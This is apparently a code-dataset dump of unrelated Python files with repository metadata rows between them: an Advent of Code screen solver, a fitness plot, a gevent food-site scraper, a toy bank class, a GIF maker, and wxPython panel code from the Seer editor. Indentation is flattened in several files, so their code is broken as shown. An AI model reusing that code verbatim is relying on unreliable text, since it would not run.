coordinate = int(parts[2].split('=')[-1])
distance = int(parts[4])
if parts[1] == 'row':
new_screen[coordinate] = rotate(new_screen[coordinate], distance)
elif parts[1] == 'column':
unrotated = [row[coordinate] for row in new_screen]
rotated = rotate(unrotated, distance)
            for i, value in enumerate(rotated):
new_screen[i][coordinate] = value
else:
raise Exception
else:
raise Exception
return new_screen
instructions = inputs.splitlines()
screen = [[0] * 50 for _ in range(6)]  # independent rows; list multiplication would alias one row six times
for instruction in instructions:
screen = process_instruction(instruction, screen)
print(sum(sum(row) for row in screen))
# part 2
for row in screen:
translated = ''.join(str(number) for number in row).replace('0', ' ').replace('1', '@')
print(translated)
|
[
"ryan@foxrow.com"
] |
ryan@foxrow.com
|
62ee5cf8e0858a9aefaa9d66f8e2f7626cf32e90
|
6289a4a15d51c9d12b94428617a148588097caee
|
/graph_convergence.py
|
fd97b10c9078a2ce71458bd6a385c9467f1c4675
|
[] |
no_license
|
david-franz/Genetic-Algorithm-Library
|
9f482213c021acd98018e1868016cb5463182a10
|
f7dd489ee7cd7fca2e1a495e2c4f4514756d7682
|
refs/heads/main
| 2023-07-18T19:09:23.958331
| 2021-09-05T17:08:16
| 2021-09-05T17:08:16
| 398,702,158
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 863
|
py
|
import matplotlib.pyplot as plt
# this file graphs a list of lists, with each list representing the convergence data for each run of the algorithm
class GraphConvergence:
    # The best-fitness-per-generation data is passed directly to draw()
    # rather than stored on the instance.
def draw(self, title, best_fitnesses_for_each_gen_for_each_run):
        gens = list(range(len(best_fitnesses_for_each_gen_for_each_run)))
        plt.plot(gens, best_fitnesses_for_each_gen_for_each_run)
plt.title(title)
        plt.xlabel('gen #')  # name the x and y axes
        plt.ylabel('best fitness for gen')
plt.show()
|
[
"davidfranznz@gmail.com"
] |
davidfranznz@gmail.com
|
9fbf373540f34ff54d25b2d079b04f1b9ec0d203
|
d4d69ddf357d385b14d95d8d1e91802d8ac1a165
|
/薄荷食物.py
|
2727dc2356f060d43e03e01e181f29b389957501
|
[] |
no_license
|
leediiaa/getall
|
78ffb096efc63ebe5538b75545a568add2256d6b
|
d0653767a1392581ef0d525e32b0094b3af7106c
|
refs/heads/master
| 2021-01-06T02:51:50.251741
| 2020-02-17T20:47:53
| 2020-02-17T20:47:53
| 241,205,034
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,883
|
py
|
# Import the required libraries and modules:
from gevent import monkey
monkey.patch_all()
import gevent, requests, bs4, csv
from gevent.queue import Queue
work = Queue()
# Create the queue object and assign it to work.
# URLs of the food records on the first 3 pages of the first 3 common food categories:
url_1 = 'http://www.boohee.com/food/group/{type}?page={page}'
for x in range(1, 4):
    for y in range(1, 4):
        real_url = url_1.format(type=x, page=y)
        work.put_nowait(real_url)
# The two for loops set the category number and the page number.
# Then each constructed URL is added to the queue with put_nowait.
# URLs of the food records on the first 3 pages of the 11th common food category:
url_2 = 'http://www.boohee.com/food/view_menu?page={page}'
for x in range(1,4):
    real_url = url_2.format(page=x)
    work.put_nowait(real_url)
# The for loop sets the page number for the 11th common food category.
# Then each constructed URL is added to the queue with put_nowait.
def crawler():
    # Define the crawler function
    headers = {
        'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36'
    }
    # Add the request headers
    while not work.empty():
        # While the queue is not empty, run the steps below.
        url = work.get_nowait()
        # Use get_nowait() to pull one of the queued URLs off the queue.
        res = requests.get(url, headers=headers)
        # Fetch the page source with requests.get.
        bs_res = bs4.BeautifulSoup(res.text, 'html.parser')
        # Parse the page source with BeautifulSoup.
        foods = bs_res.find_all('li', class_='item clearfix')
        # Use find_all to extract the <li class="item clearfix"> tags.
        for food in foods:
            # Iterate over foods
            food_name = food.find_all('a')[1]['title']
            # Under the <li class="item clearfix"> tag, take the title attribute of the second <a> element: the food's name.
            food_url = 'http://www.boohee.com' + food.find_all('a')[1]['href']
            # Take the href of the second <a> element and join it with 'http://www.boohee.com' to get the food's detail-page link.
            food_calorie = food.find('p').text
            # Use find to get the <p> element under the <li> tag, then .text for the plain text: the food's calories.
            print(food_name)
            # Print the food's name.
tasks_list = []
# Create an empty task list
for x in range(5):
    # Effectively creates 5 crawlers
    task = gevent.spawn(crawler)
    # Use gevent.spawn() to create a task that executes the crawler() function.
    tasks_list.append(task)
    # Append the task to the task list.
gevent.joinall(tasks_list)
# Use gevent.joinall to start the coroutines and run all the tasks in the list, setting the crawler loose on the site.
|
[
"cml13012272310@163.com"
] |
cml13012272310@163.com
|
f0ecedd383456b40b02ac7a4b0217dad0b0bdceb
|
90853c1856ef68dcae1d81dc9c294c5b7feaaf1d
|
/groger_saque.py
|
7fd204a699b7f68ed17569d730415db4046c0da9
|
[] |
no_license
|
hugoerico/aula14
|
64568597bb8cbc93220f1dabb27428325be8e272
|
816aea5be64db282570476e5b3389ca2c2af9ac8
|
refs/heads/master
| 2020-09-21T05:05:23.021271
| 2019-12-17T05:37:16
| 2019-12-17T05:37:16
| 224,687,704
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,538
|
py
|
class Banco:
def __init__(self,nome,idade,saldo):
self.nome=nome
self.idade=idade
self.saldo=saldo
def __str__(self):
return f"nome: {self.nome}, idade: {self.idade}, saldo:{self.saldo}"
def saque(self, valor):
self.valor = valor
        if self.valor > self.saldo or self.valor > 1000:  # deny if the amount exceeds the balance or the R$1000 per-withdrawal limit
            return 'Saque negado'
else:
self.saldo -= self.valor
return f'aprovado. Saldo em conta: R${self.saldo}'
def deposito(self, valor):
self.valor = valor
if valor > 5000:
return 'Deposito negado'
else:
self.saldo += self.valor
return f' aprovado. Saldo em conta: R${self.saldo}'
    def emprestimo(self, valor):
        self.valor = valor
        if self.idade < 21 and self.saldo > 1000 and self.valor < (self.saldo*15):
            self.saldo += self.valor
            return f' aprovado. Saldo em conta: R${self.saldo}'
        return 'Emprestimo negado'  # explicit denial instead of an implicit None
pessoa = Banco(str(input('Nome completo: ')), int(input('Idade: ')), saldo=2000.00)
print('''Qual operação gostaria de realizar?:
1 Saque
2 Deposito
3 Emprestimo
Qualquer outro texto ou número Sair''')
usuario = input('digite sua opção: ')
if usuario == '1':
print(pessoa.saque(float(input('digite o valor do saque: R$'))))
elif usuario == '2':
    print(pessoa.deposito(float(input('digite o valor do deposito: R$'))))
elif usuario == '3':
print(pessoa.emprestimo(float(input('digite o valor do emprestimo: R$'))))
else :
print('tchau')
|
[
"hugo.019@hotmail.com"
] |
hugo.019@hotmail.com
|
ea93677c84c5ab62840d8394d3daebe99f51d6e5
|
350480124d05030a64c0a9b500ea56370fa4532f
|
/giffer.py
|
1585fdee161aec9e2a6bb52d34c1cda9dfcfede9
|
[] |
no_license
|
achogovadze/public
|
aa4556aa05878946868a7885020739c672c79514
|
f341035379a39b26da65ad487b30400f909c1d07
|
refs/heads/main
| 2023-04-26T22:43:30.605479
| 2021-05-27T14:15:05
| 2021-05-27T14:15:05
| 371,396,462
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 464
|
py
|
import imageio
images = []
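# Each frame is listed three times so the resulting GIF plays back more slowly.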
filenames = [
'1.png',
'1.png',
'1.png',
'2.png',
'2.png',
'2.png',
'3.png',
'3.png',
'3.png',
'4.png',
'4.png',
'4.png',
'5.png',
'5.png',
'5.png',
'6.png',
'6.png',
'6.png',
'7.png',
'7.png',
'7.png',
'8.png',
'8.png',
'8.png',
]
for filename in filenames:
images.append(imageio.imread(filename))
imageio.mimsave('movie.gif', images)
|
[
"alex@pulsar.ai"
] |
alex@pulsar.ai
|
4bb5fb7059095abf1ff71ac43d972b1760591690
|
eef4344b87418dffc152f5de7217308c28bda2d5
|
/sNotebook.py
|
ed5eb2162450db466b33e7f671d9fced0c660464
|
[] |
no_license
|
Thoshh/seer-editor
|
fa4ec715a0dfe6b939af1c4b896ed98848f1608f
|
6b95e6909360c153ef42c9ffd0b3b3efd92a3a65
|
refs/heads/master
| 2016-08-12T11:08:53.598525
| 2007-08-22T00:54:07
| 2007-08-22T00:54:07
| 55,092,422
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 27,634
|
py
|
#!/usr/bin/env python
# -*- coding: iso-8859-1 -*-
# Initial code framework based from DrPython, Copyright 2003-2007 Daniel Pozmanter
# Distributed under the terms of the GPL (GNU Public License)
#
# Seer is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#The Notebook, and Panels.
import os.path
import wx
import wx.stc
from sText import sText
import sEncoding
#*************************************************
#Used in the main panel.
class sSashWindow(wx.SashWindow):
def __init__(self, parent, id, pos, size, style=0):
wx.SashWindow.__init__(self, parent, id, pos, size, style)
self.parent = parent.parent
self.Bind(wx.EVT_KEY_DOWN, self.OnKeyDown)
def OnKeyDown(self, event):
self.parent.RunShortcuts(event)
def SetNotebook(self, notebook):
        '''Can only be called once.'''
self.notebook = notebook
self.theSizer = wx.BoxSizer(wx.HORIZONTAL)
self.theSizer.Add(self.notebook, 1, wx.EXPAND)
self.SetAutoLayout(True)
self.SetSizer(self.theSizer)
#*************************************************
#This is the main panel,
#Where all the sizing stuff happens.
class sMainPanel(wx.Panel):
def __init__(self, parent, id):
wx.Panel.__init__(self, parent, id)
self.panelsizesfile = parent.datdirectory + "/seer.panel.sizes.dat"
self.parent = parent
width, height = self.GetSizeTuple()
#Variables to Keep Track of what is being used.
self.ID_DOCUMENT = 6001
self.ID_PROMPT = 6002
self.ID_LEFT = 6003
self.ID_RIGHT = 6004
self.ID_TOP = 6005
self.PromptIsVisible = self.parent.prefs.promptisvisible
self.LeftIsVisible = False
self.RightIsVisible = False
self.TopIsVisible = False
self.documenttuple = (width, height)
self.prompttuple = (0, 0)
self.lefttuple = (0, 0)
self.righttuple = (0, 0)
self.toptuple = (0, 0)
self.promptsize = self.parent.prefs.promptsize
self.prompt = sSashWindow(self, self.ID_PROMPT, wx.DefaultPosition, wx.DefaultSize, wx.SW_3D)
self.prompt.SetSashVisible(wx.SASH_TOP, True)
self.prompt.SetSashBorder(wx.SASH_TOP, True)
self.document = sSashWindow(self, self.ID_DOCUMENT, wx.DefaultPosition, wx.DefaultSize, wx.SW_3D)
self.document.SetSashVisible(wx.SASH_BOTTOM, True)
self.document.SetSashBorder(wx.SASH_BOTTOM, True)
self.leftsize = self.parent.prefs.sidepanelleftsize
self.left = sSashWindow(self, self.ID_LEFT, wx.DefaultPosition, wx.DefaultSize, wx.SW_3D)
self.rightsize = self.parent.prefs.sidepanelrightsize
self.right = sSashWindow(self, self.ID_RIGHT, wx.DefaultPosition, wx.DefaultSize, wx.SW_3D)
self.topsize = self.parent.prefs.sidepaneltopsize
self.top = sSashWindow(self, self.ID_TOP, wx.DefaultPosition, wx.DefaultSize, wx.SW_3D)
self.document.SetSashVisible(wx.SASH_LEFT, True)
self.document.SetSashBorder(wx.SASH_LEFT, True)
self.document.SetSashVisible(wx.SASH_RIGHT, True)
self.document.SetSashBorder(wx.SASH_RIGHT, True)
self.document.SetSashVisible(wx.SASH_TOP, True)
self.document.SetSashBorder(wx.SASH_TOP, True)
self.prompt.SetSashVisible(wx.SASH_LEFT, True)
self.prompt.SetSashBorder(wx.SASH_LEFT, True)
self.prompt.SetSashVisible(wx.SASH_RIGHT, True)
self.prompt.SetSashBorder(wx.SASH_RIGHT, True)
self.oldwidth, self.oldheight = 0, 0
self.leftNotebook = sSidePanelNotebook(self.left, -1, 0)
self.rightNotebook = sSidePanelNotebook(self.right, -1, 1)
self.topNotebook = sSidePanelNotebook(self.top, -1, 1)
self.left.SetNotebook(self.leftNotebook)
self.right.SetNotebook(self.rightNotebook)
self.top.SetNotebook(self.topNotebook)
self.lidx = []
self.ridx = []
self.tidx = []
self.OnSize(None)
self.Bind(wx.EVT_SIZE, self.OnSize)
self.Bind(wx.EVT_SASH_DRAGGED, self.OnSashDrag, id=self.ID_DOCUMENT)
self.Bind(wx.EVT_SASH_DRAGGED, self.OnSashDrag, id=self.ID_PROMPT)
def _getindex(self, Position, Index):
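        # Map a caller-supplied index to the actual notebook page index for the given panel position.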
#Left
if Position == 0:
if Index in self.lidx:
Index = self.lidx.index(Index)
#Right
elif Position == 1:
if Index in self.ridx:
Index = self.ridx.index(Index)
#Top
else:
if Index in self.tidx:
Index = self.tidx.index(Index)
return Index
def ClosePanel(self, Position, Index):
Index = self._getindex(Position, Index)
#Left
if Position == 0:
self.leftNotebook.DeletePage(Index)
self.lidx.pop(Index)
if self.leftNotebook.GetPageCount() < 1:
self.LeftIsVisible = False
#Right
elif Position == 1:
self.rightNotebook.DeletePage(Index)
self.ridx.pop(Index)
if self.rightNotebook.GetPageCount() < 1:
self.RightIsVisible = False
#Top
else:
self.topNotebook.DeletePage(Index)
self.tidx.pop(Index)
if self.topNotebook.GetPageCount() < 1:
self.TopIsVisible = False
wx.Yield()
self.OnSize(None)
def GetTargetNotebookPage(self, Position=1, Title=' '):
#Left
if Position == 0:
l = self.leftNotebook.GetPageCount()
self.lidx.append(l)
newpage = sSidePanel(self.leftNotebook, -1)
self.leftNotebook.AddPage(newpage, Title, True)
self.LeftIsVisible = True
#Right
elif Position == 1:
l = self.rightNotebook.GetPageCount()
self.ridx.append(l)
newpage = sSidePanel(self.rightNotebook, -1)
self.rightNotebook.AddPage(newpage, Title, True)
self.RightIsVisible = True
#Top
else:
l = self.topNotebook.GetPageCount()
self.tidx.append(l)
newpage = sSidePanel(self.topNotebook, -1)
self.topNotebook.AddPage(newpage, Title, True)
self.TopIsVisible = True
return newpage, l
def IsVisible(self, Position=1, Index=0):
Index = self._getindex(Position, Index)
#Left
if Position == 0:
return (self.leftNotebook.GetSelection() == Index) and self.LeftIsVisible
#Right
elif Position == 1:
return (self.rightNotebook.GetSelection() == Index) and self.RightIsVisible
#Top
else:
return (self.topNotebook.GetSelection() == Index) and self.TopIsVisible
def MemorizePanelSizes(self):
if self.parent.prefs.rememberpanelsizes:
try:
f = file(self.panelsizesfile, 'wb')
f.write(str(self.promptsize) + '\n' + str(self.leftsize) + '\n' + str(self.rightsize) + '\n' + str(self.topsize))
f.close()
except:
self.parent.ShowMessage('Error Memorizing Panel Sizes.')
def OnSashDrag(self, event):
evtheight = event.GetDragRect().height
evtwidth = event.GetDragRect().width
width, height = self.GetSizeTuple()
if evtwidth < 0:
evtwidth = 0
elif evtwidth > width:
evtwidth = width
if event.GetDragStatus() == wx.SASH_STATUS_OUT_OF_RANGE:
if (not self.PromptIsVisible) or (evtheight < height):
evtheight = 0
else:
evtheight = height
elif evtheight > height:
evtheight = height
oldsize = self.promptsize
loldsize = self.leftsize
roldsize = self.rightsize
toldsize = self.topsize
#Edge Drag
e = event.GetId()
edge = event.GetEdge()
if edge == wx.SASH_LEFT:
self.leftsize = ((width*100) - (evtwidth*100)) / width
elif edge == wx.SASH_RIGHT:
self.rightsize = ((width*100) - (evtwidth*100)) / width
elif e == self.ID_DOCUMENT:
if edge == wx.SASH_BOTTOM:
self.promptsize = ((height*100) - (evtheight*100)) / height
self.documenttuple = (self.documenttuple[0], evtheight)
self.prompttuple = (self.prompttuple[0], height-evtheight)
elif edge == wx.SASH_TOP:
self.topsize = ((height*100) - (evtheight*100)) / height
elif e == self.ID_PROMPT:
self.promptsize = ((evtheight*100) / height)
#Prompt Is Visible
if self.promptsize == 0:
self.promptsize = oldsize
self.PromptIsVisible = False
elif not self.PromptIsVisible and self.prompttuple[1] > 0:
self.PromptIsVisible = True
#Left Is Visible
if self.leftsize == 0:
self.leftsize = loldsize
self.LeftIsVisible = False
elif not self.LeftIsVisible and self.lefttuple[0] > 0:
self.LeftIsVisible = True
#Right Is Visible
if self.rightsize == 0:
self.rightsize = roldsize
self.RightIsVisible = False
elif not self.RightIsVisible and self.righttuple[0] > 0:
self.RightIsVisible = True
#Top Is Visible
if self.topsize == 0:
self.topsize = toldsize
self.TopIsVisible = False
elif not self.TopIsVisible and self.toptuple[1] > 0:
self.TopIsVisible = True
self.OnSize(None)
def OnSize(self, event):
width, height = self.GetSizeTuple()
if (event is not None) and (width == self.oldwidth) and (height == self.oldheight):
return
self.oldwidth, self.oldheight = width, height
#Height
heightPrompt = 0
heightTop = 0
if self.TopIsVisible:
heightTop = (height * self.topsize) / 100
if self.PromptIsVisible:
heightPrompt = (height * self.promptsize) / 100
heightDocument = height - heightTop - heightPrompt
if heightPrompt != 100:
if heightDocument < 50:
if heightTop > 0:
heightTop = heightTop / 2
if heightPrompt > 0:
heightPrompt = heightPrompt / 2
heightDocument += heightTop + heightPrompt
#Width
widthLeft = 0
widthRight = 0
if self.LeftIsVisible:
widthLeft = (width * self.leftsize) / 100
if self.RightIsVisible:
widthRight = (width * self.rightsize) / 100
widthMain = width - widthLeft - widthRight
if widthMain < 50:
if widthLeft > 0:
widthLeft = widthLeft / 2
if widthRight > 0:
widthRight = widthRight / 2
widthMain += widthLeft + widthRight
#Tuples
self.documenttuple = (widthMain, heightDocument)
self.prompttuple = (widthMain, heightPrompt)
self.lefttuple = (widthLeft, height)
self.righttuple = (widthRight, height)
self.toptuple = (widthMain, heightTop)
#Set Move, Then Set Size
self.document.Move((widthLeft, heightTop))
self.prompt.Move((widthLeft, heightDocument+heightTop))
self.left.Move((0, 0))
self.right.Move((widthLeft+widthMain, 0))
self.top.Move((widthLeft, 0))
self.document.SetSize(self.documenttuple)
self.prompt.SetSize(self.prompttuple)
self.left.SetSize(self.lefttuple)
self.right.SetSize(self.righttuple)
self.top.SetSize(self.toptuple)
def RememberPanelSizes(self):
if self.parent.prefs.rememberpanelsizes:
if not os.path.exists(self.panelsizesfile):
return
try:
f = file(self.panelsizesfile, 'rb')
text = f.read()
f.close()
p, l, r, t = map(int, text.split('\n'))
self.promptsize = p
self.leftsize = l
self.rightsize = r
self.topsize = t
except:
self.parent.ShowMessage('Error Remembering Panel Sizes.\nThe File: "%s" may be corrupt.\nTry removing it, and restarting Seer.' % self.panelsizesfile)
def SetPanelSize(self, Position, size):
if Position == 0:
self.leftsize = size
elif Position == 1:
self.rightsize = size
else:
self.topsize = size
def ShowPanel(self, Position, Index, Show=True):
Index = self._getindex(Position, Index)
#Left
if Position == 0:
self.LeftIsVisible = Show
if self.LeftIsVisible:
self.leftNotebook.SetSelection(Index)
self.leftNotebook.GetPage(Index).OnSize(None)
#Right
elif Position == 1:
self.RightIsVisible = Show
if self.RightIsVisible:
self.rightNotebook.SetSelection(Index)
self.rightNotebook.GetPage(Index).OnSize(None)
#Top
else:
self.TopIsVisible = Show
if self.TopIsVisible:
self.topNotebook.SetSelection(Index)
self.topNotebook.GetPage(Index).OnSize(None)
self.OnSize(None)
def TogglePanel(self, Position=1, Index=0):
Index = self._getindex(Position, Index)
#Left
if Position == 0:
if not self.LeftIsVisible:
self.LeftIsVisible = True
self.leftNotebook.SetSelection(Index)
else:
self.LeftIsVisible = False
#Right
elif Position == 1:
if not self.RightIsVisible:
self.RightIsVisible = True
self.rightNotebook.SetSelection(Index)
else:
self.RightIsVisible = False
#Top
else:
if not self.TopIsVisible:
self.TopIsVisible = True
self.topNotebook.SetSelection(Index)
else:
self.TopIsVisible = False
self.OnSize(None)
#*************************************************
def _refresh(x):
x.Refresh()
#*******************************************************************************************************
#Notebook base class
class sNotebook(wx.Notebook):
def __init__(self, parent, id, images, closefunction):
wx.Notebook.__init__(self, parent, id, wx.DefaultPosition, wx.Size(-1, -1), wx.CLIP_CHILDREN)
self.parent = parent
self.grandparent = parent.parent
self.closefunction = closefunction
if images:
imagesize = (16, 16)
self.imagelist = wx.ImageList(imagesize[0], imagesize[1])
self.images = images
map(self.imagelist.Add, self.images)
self.AssignImageList(self.imagelist)
#wxPython bug workaround, OldSelection doesn't work.
self.oldselection = 0
def OnLeftDoubleClick(self, event):
if self.grandparent.prefs.doubleclicktoclosetab:
self.closefunction(None)
#*************************************************
#Document Notebook
class sDocNotebook(sNotebook):
def __init__(self, parent, id):
grandparent = parent.parent
images = [wx.BitmapFromImage(wx.Image(grandparent.bitmapdirectory + "/16/unmodified.png", wx.BITMAP_TYPE_PNG)),
wx.BitmapFromImage(wx.Image(grandparent.bitmapdirectory + "/16/modified.png", wx.BITMAP_TYPE_PNG)),
wx.BitmapFromImage(wx.Image(grandparent.bitmapdirectory + "/16/active unmodified.png", wx.BITMAP_TYPE_PNG)),
wx.BitmapFromImage(wx.Image(grandparent.bitmapdirectory + "/16/active modified.png", wx.BITMAP_TYPE_PNG))]
sNotebook.__init__(self, parent, id, images, grandparent.OnClose)
self.Bind(wx.EVT_NOTEBOOK_PAGE_CHANGED, self.OnPageChanged)
self.Bind(wx.EVT_RIGHT_DOWN, self.OnPopUp)
self.Bind(wx.EVT_LEFT_UP, self.OnSelectTab)
self.Bind(wx.EVT_LEFT_DCLICK, self.OnLeftDoubleClick)
def OnPageChanged(self, event):
if not self.grandparent.txtDocumentArray:
if event is not None:
event.Skip()
return
if event is not None:
i = event.GetSelection()
else:
i = self.GetSelection()
l = self.GetPageCount()
if (i < 0) or (i >= l):
if event is not None:
event.Skip()
return
if self.oldselection < l:
self.grandparent.txtDocumentArray[self.oldselection].IsActive = False
self.grandparent.txtDocumentArray[self.oldselection].OnModified(None)
self.oldselection = i
self.grandparent.txtDocumentArray[i].IsActive = True
self.grandparent.txtDocumentArray[i].OnModified(None)
if event is not None:
event.Skip()
def OnPopUp(self, event):
tabmenu = wx.Menu()
tabmenu.Append(self.grandparent.ID_CLOSE, "&Close")
tabmenu.Append(self.grandparent.ID_CLOSE_ALL, "Close &All Tabs")
tabmenu.Append(self.grandparent.ID_CLOSE_ALL_OTHER_DOCUMENTS, "Close All &Other Tabs")
tabmenu.AppendSeparator()
tabmenu.Append(self.grandparent.ID_NEXT_DOCUMENT, "Next Tab")
tabmenu.Append(self.grandparent.ID_PREVIOUS_DOCUMENT, "Previous Tab")
tabmenu.Append(self.grandparent.ID_FIRST_DOCUMENT, "First Tab")
tabmenu.Append(self.grandparent.ID_LAST_DOCUMENT, "Last Tab")
tabmenu.AppendSeparator()
tabmenu.Append(self.grandparent.ID_RELOAD, "&Reload File")
tabmenu.Append(self.grandparent.ID_RESTORE_FROM_BACKUP, "&Restore From Backup")
tabmenu.AppendSeparator()
tabmenu.Append(self.grandparent.ID_SAVE, "&Save")
tabmenu.Append(self.grandparent.ID_SAVE_AS, "Save &As...")
ht = self.HitTest(event.GetPosition())[0]
if ht > -1:
self.SetSelection(ht)
self.SetTab()
tabmenu.Enable(self.grandparent.ID_RELOAD, len(self.grandparent.txtDocument.filename) > 0)
tabmenu.Enable(self.grandparent.ID_RESTORE_FROM_BACKUP, len(self.grandparent.txtDocument.filename) > 0)
self.PopupMenu(tabmenu, event.GetPosition())
tabmenu.Destroy()
def OnSelectTab(self, event):
selection = self.GetSelection()
if selection != self.grandparent.docPosition:
self.SetTab()
event.Skip()
def SetTab(self):
selection = self.GetSelection()
if selection != -1:
self.grandparent.setDocumentTo(selection)
#*************************************************
#Prompt Notebook
class sPromptNotebook(sNotebook):
def __init__(self, parent, id):
grandparent = parent.parent
images = [wx.BitmapFromImage(wx.Image(grandparent.bitmapdirectory + "/16/not running.png", wx.BITMAP_TYPE_PNG)),
wx.BitmapFromImage(wx.Image(grandparent.bitmapdirectory + "/16/running.png", wx.BITMAP_TYPE_PNG)),
wx.BitmapFromImage(wx.Image(grandparent.bitmapdirectory + "/16/active not running.png", wx.BITMAP_TYPE_PNG)),
wx.BitmapFromImage(wx.Image(grandparent.bitmapdirectory + "/16/active running.png", wx.BITMAP_TYPE_PNG))]
sNotebook.__init__(self, parent, id, images, grandparent.OnClosePrompt)
self.Bind(wx.EVT_NOTEBOOK_PAGE_CHANGED, self.OnPageChanged)
self.Bind(wx.EVT_LEFT_UP, self.OnSelectTab)
self.Bind(wx.EVT_LEFT_DCLICK, self.OnLeftDoubleClick)
self.Bind(wx.EVT_RIGHT_DOWN, self.OnPopUp)
def OnPageChanged(self, event):
if not self.grandparent.txtPromptArray:
if event is not None:
event.Skip()
return
if event is not None:
i = event.GetSelection()
else:
i = self.GetSelection()
l = self.GetPageCount()
if (i < 0) or (i >= l):
if event is not None:
event.Skip()
return
if self.oldselection < l:
if self.grandparent.txtPromptArray[self.oldselection].pid > -1:
self.SetPageImage(self.oldselection, 1)
else:
self.SetPageImage(self.oldselection, 0)
self.oldselection = i
if self.grandparent.txtPromptArray[i].pid > -1:
self.SetPageImage(i, 3)
else:
self.SetPageImage(i, 2)
if event is not None:
event.Skip()
def OnSelectTab(self, event):
selection = self.GetSelection()
if selection != self.grandparent.promptPosition:
self.SetTab()
event.Skip()
def SetTab(self):
selection = self.GetSelection()
if selection != -1:
self.grandparent.setPromptTo(selection)
def OnPopUp(self, event):
tabmenu = wx.Menu()
tabmenu.Append(self.grandparent.ID_CLOSE_PROMPT, "&Close Prompt")
tabmenu.AppendSeparator()
tabmenu.Append(self.grandparent.ID_PYTHON, "&Python")
tabmenu.Append(self.grandparent.ID_RUN, "&Run Current Document")
tabmenu.Append(self.grandparent.ID_END, "&End")
ht = self.HitTest(event.GetPosition())[0]
if ht > -1:
self.SetSelection(ht)
self.SetTab()
tabmenu.Enable(self.grandparent.ID_RUN, (len(self.grandparent.txtDocument.filename) > 0))
tabmenu.Enable(self.grandparent.ID_END, (self.grandparent.txtPrompt.pid > -1))
self.PopupMenu(tabmenu, event.GetPosition())
tabmenu.Destroy()
#*************************************************
#Notebook to be used in the side panels.
class sSidePanelNotebook(sNotebook):
def __init__(self, parent, id, Position):
self.parent = parent.parent
self.PanelPosition = Position
self.ID_CLOSE = 50
sNotebook.__init__(self, parent, id, [], self.OnClose)
self.grandparent = self.GetParent().GetParent()
self.Bind(wx.EVT_MENU, self.OnClose, id=self.ID_CLOSE)
self.Bind(wx.EVT_NOTEBOOK_PAGE_CHANGED, self.OnPageChanged)
self.Bind(wx.EVT_LEFT_DCLICK, self.OnLeftDoubleClick)
self.Bind(wx.EVT_RIGHT_DOWN, self.OnPopUp)
self.Bind(wx.EVT_SIZE, self.OnSize)
def OnClose(self, event):
if self.GetPageCount() > 0:
self.grandparent.ClosePanel(self.PanelPosition, self.GetSelection())
self.grandparent.OnSize(None)
def OnPageChanged(self, event):
sel = self.GetSelection()
if sel > -1:
self.GetPage(sel).OnSize(None)
event.Skip()
def OnSize(self, event):
if event is not None:
if self.GetPageCount() > 0:
self.GetPage(self.GetSelection()).SetSize(self.GetSize())
event.Skip()
def OnPopUp(self, event):
tabmenu = wx.Menu()
tabmenu.Append(self.ID_CLOSE, "&Close Panel")
ht = self.HitTest(event.GetPosition())[0]
if ht > -1:
self.SetSelection(ht)
self.PopupMenu(tabmenu, event.GetPosition())
tabmenu.Destroy()
#*************************************************
#Panel class for panels with a single stc.
class sPanel(wx.Panel):
def __init__(self, parent, id):
wx.Panel.__init__(self, parent, id)
self.grandparent = parent.GetGrandParent()
self.stc = None
self.Bind(wx.EVT_SIZE, self.OnSize)
self.Bind(wx.EVT_KEY_DOWN, self.OnKeyDown)
def OnKeyDown(self, event):
self.grandparent.GetParent().RunShortcuts(event)
def OnSize(self, event):
if self.stc is not None:
self.stc.SetSize(self.GetSize())
if event is not None:
event.Skip()
def SetSTC(self, stc):
self.stc = stc
#*************************************************
#Panel class for side panels.
class sSidePanel(wx.Panel):
def __init__(self, parent, id):
wx.Panel.__init__(self, parent, id)
self.panel = None
self.parent = parent
self.grandparent = parent.GetGrandParent()
self.Bind(wx.EVT_KEY_DOWN, self.OnKeyDown)
self.Bind(wx.EVT_SIZE, self.OnSize)
def OnSize(self, event):
if self.panel is not None:
self.panel.SetSize(self.GetSize())
if event is not None:
event.Skip()
def OnKeyDown(self, event):
self.grandparent.GetParent().RunShortcuts(event)
def SetPanel(self, panel):
self.panel = panel
#*************************************************
#View In Panel
class sSplitTextPanel(wx.Panel):
def __init__(self, parent, grandparent, targetstc, position, index):
docid = grandparent.txtDocument.GetId()
wx.Panel.__init__(self, parent, docid)
ID_CLOSE = grandparent.GetNewId()
self.position = position
self.index = index
self.parent = parent
self.grandparent = grandparent
if docid == targetstc.GetId():
sv = -1
else:
sv = 1
self.txtDoc = sText(self, docid, grandparent, SplitView=sv)
self.txtDoc.SetupPrefsDocument()
self.txtDoc.SetDocPointer(targetstc.GetDocPointer())
self.txtDoc.GotoPos(targetstc.GetCurrentPos())
self.txtDoc.ScrollToLine(targetstc.GetCurrentLine())
self.label = wx.TextCtrl(self, -1, " Viewing: " + targetstc.GetFilenameTitle(), size=(150, -1), style=wx.TE_READONLY)
self.btnClose = wx.Button(self, ID_CLOSE, "Close")
self.topSizer = wx.BoxSizer(wx.HORIZONTAL)
self.theSizer = wx.BoxSizer(wx.VERTICAL)
self.topSizer.Add(self.label, 1, wx.EXPAND)
self.topSizer.Add(self.btnClose, 0, wx.SHAPED | wx.ALIGN_RIGHT)
self.theSizer.Add(self.topSizer, 0, wx.EXPAND)
self.theSizer.Add(self.txtDoc, 1, wx.EXPAND)
self.SetAutoLayout(True)
self.SetSizer(self.theSizer)
text = self.txtDoc.GetText()
#Scrolling
bufferstring = sEncoding.EncodeText(self.grandparent, '000', self.txtDoc.GetEncoding())
lines = text.split(self.txtDoc.GetEndOfLineCharacter())
